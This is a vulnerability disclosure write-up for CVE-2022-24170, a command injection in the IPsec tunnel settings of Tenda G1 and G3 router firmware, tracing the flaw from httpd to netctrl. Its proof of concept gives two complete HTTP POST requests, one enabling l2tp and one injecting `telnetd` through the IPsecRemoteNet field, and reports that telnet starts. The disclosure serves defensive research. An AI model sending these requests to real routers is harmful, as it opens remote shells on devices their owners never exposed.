Headline
CVE-2022-24170: my_vuln/36.md at main · pjqwudi/my_vuln
Tenda routers G1 and G3 v15.11.0.17(9502)_CN were discovered to contain a command injection vulnerability in the function formSetIpSecTunnel. This vulnerability allows attackers to execute arbitrary commands via the IPsecLocalNet and IPsecRemoteNet parameters.
Tenda Vulnerability
Vendor:Tenda
Product:G1、G3
Version:V15.11.0.17(9502)_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)
Type:Remote Command Execution
Author:Jiaqian Peng
Institution:[email protected]
Vulnerability description
We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.
Remote Command Execution
In httpd
binary:
In formSetIpSecTunnel
function, IPsecLocalNet、IPsecRemoteNet
is directly passed by the attacker, so we can control the IPsecLocalNet、IPsecRemoteNet
to attack the OS.
First, make corresponding settings according to the selected network mode. This vulnerability occurs in the setIpSecTunnelSettings
function. We mainly explain the data flow of this part.
Here, enter the function getIpSecTunnelSettings
for the next data flow tracking.
The part that gets the user input is in the function getIpSecTunnelSettings
.
As you can see here, in setIpSecTunnelSettings
function, the input has not been checked. And then, call the function prod_cfm_set_val
to store this input.
This step is mainly for inter-process communication, the vulnerability will be triggered in another binary file.
The necessary condition for successfully triggering the vulnerability is to enable the l2tp service, so we need to send two packets to complete the triggering of the vulnerability
In netctrl
binary:
In vpn_ipsec_init_param
function, the initial input will be extracted.
Eventually, in vpn_ipsec_enable
function, the initial input will cause command injection.
There are many trigger points in the program execution process, only one place is shown here.
Supplement
The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.
Vulnerability trigger steps:
- Enable l2tp service
- Set ipsectunel
PoC
Enable l2tp service.
POST /goform/setVpnServer HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 79 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/vpn/pptpServer.html?0.9176754136302114 Cookie: _:USERNAME:_=; G3v3_user=
vpnServerEn=true&vpnServerType=l2tp&vpnServerWAN=WAN1&l2tpServerEncrypt=disable
We set IPsecRemoteNet
as telnetd
, and the router will excute it,such as:
POST /goform/setIPsecTunnel HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 590 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/vpn/ipsec.html?0.40102392250425467 Cookie: _:USERNAME:_=; G3v3_user=
IPsecTunnelIndex=0&IPsecEn=true&IPsecWrapMode=tunnel&IPsecWAN=WAN1&IPsecConnectName=pjqwudi&IPsecDealMode=1&IPsecTunnelProtocol=ESP&IPsecGateway=www.baidu.com&IPsecLocalNet=192.168.1.0%2F24&IPsecRemoteNet=`telnetd`&IPsecNegotiation=auto&IPsecSecurity=psk&IPsecSharePwd=123123123&IPsecDPDEn=true&IPsecDPDTime=1&IPsecMode=main&IPsecEncrypt1=3DES&IPsecVerify1=SHA1&IPsecDH1=768&IPsecRemoteIdentifierEn=false&IPsecRemoteIdentifier=&IPsecLocalIdentifierEn=false&IPsecLocalIdentifier=&IPsecPwdValidity1=3600&IPsecPFSEn=true&IPsecEncrypt2=3DES&IPsecVerify2=SHA1&IPsecDH2=768&IPsecPwdValidity2=3600
Result
The target router has enabled the telnet service.